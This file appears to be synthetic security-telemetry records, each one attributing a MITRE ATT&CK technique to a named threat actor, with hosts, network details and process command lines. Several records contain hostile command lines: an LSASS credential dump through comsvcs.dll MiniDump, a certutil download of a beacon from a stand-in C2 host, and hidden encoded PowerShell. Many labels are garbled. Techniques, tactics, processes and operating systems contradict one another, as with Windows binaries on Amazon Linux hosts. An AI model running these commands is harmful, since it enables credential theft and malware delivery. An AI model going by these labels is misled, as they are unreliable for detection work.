{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Exfiltration","Command and Control"],"technique_id":"T1021.006"},"event_id":"evt_unc4841_20251219T180533000Z_0005789","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.44.55.21","name":"DB-ORACLE-CYO10NQB6M","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5789UNC4841T1021.006"},"network":{"domain":"aws.amazon.com","dst_ip":"1.54.96.178","dst_port":3389,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-12-28T16:43:09.000Z","user":{"name":"azuread\\vsabe7e0nc10","sid":"S-1-5-21-969369697-835923295-5477"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Command and Control"],"technique_id":"T1566.001"},"event_id":"evt_mustangpanda_20260113T204902000Z_0005791","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.236.136.28","name":"EC2-INST-9TMUNMO4T0","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5791Mustang PandaT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.26.184.203","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"wmic.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-06-22T14:35:39.000Z","user":{"name":"svc_ukf01uxmi2vh","sid":"S-1-5-21-762427393-741844430-3397"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1021.006 using fileless technique.","sub_technique":"Windows Remote Management","tactic":["Privilege Escalation","Exfiltration","Execution"],"technique_id":"T1021.006"},"event_id":"evt_scatteredspider_20260108T091353000Z_0005793","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.20.78.116","name":"AZURE-VM-HHTCZSJXPF","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5793Scattered SpiderT1021.006"},"network":{"domain":"cdn-content.com","dst_ip":"1.18.12.158","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1644 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-28T08:32:22.000Z","user":{"name":"arn:aws:iam::vy2i7mjaofba","sid":"S-1-5-21-500937087-494414393-9717"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1484.001 using LOLBin technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Privilege Escalation","Persistence"],"technique_id":"T1484.001"},"event_id":"evt_volttyphoon_20251014T071424000Z_0005795","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["WMI","LOLBin","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.35.248.8","name":"APP-WEB-APM99PJU5B","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5795Volt TyphoonT1484.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.67.41.38","dst_port":5985,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-03-29T14:51:38.000Z","user":{"name":"svc_0doo3d0d5iw4","sid":"S-1-5-21-678804765-579270905-1507"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection","Exfiltration","Command and Control"],"technique_id":"T1071.001"},"event_id":"evt_unc4841_20251006T095613000Z_0005797","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.70.80.185","name":"AZURE-VM-4KCF7KSIVT","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5797UNC4841T1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.97.231.147","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-10-14T10:29:30.000Z","user":{"name":"i-sjjv7mjm45gu","sid":"S-1-5-21-463549696-669483128-9239"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1021.006 using cloud-native technique.","sub_technique":"Windows Remote Management","tactic":["Defense Evasion","Execution","Credential Access"],"technique_id":"T1021.006"},"event_id":"evt_volttyphoon_20251127T213037000Z_0005799","ground_truth":{"detection_guidance":"Sigma rule for T1021.006 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.177.36.219","name":"APP-WEB-1651JD91NT","os":"Amazon Linux 2"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5799Volt TyphoonT1021.006"},"network":{"domain":"github.com","dst_ip":"1.39.236.143","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1989 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-18T04:19:23.000Z","user":{"name":"svc_yoa006n3yy85","sid":"S-1-5-21-492460709-585472162-1266"}}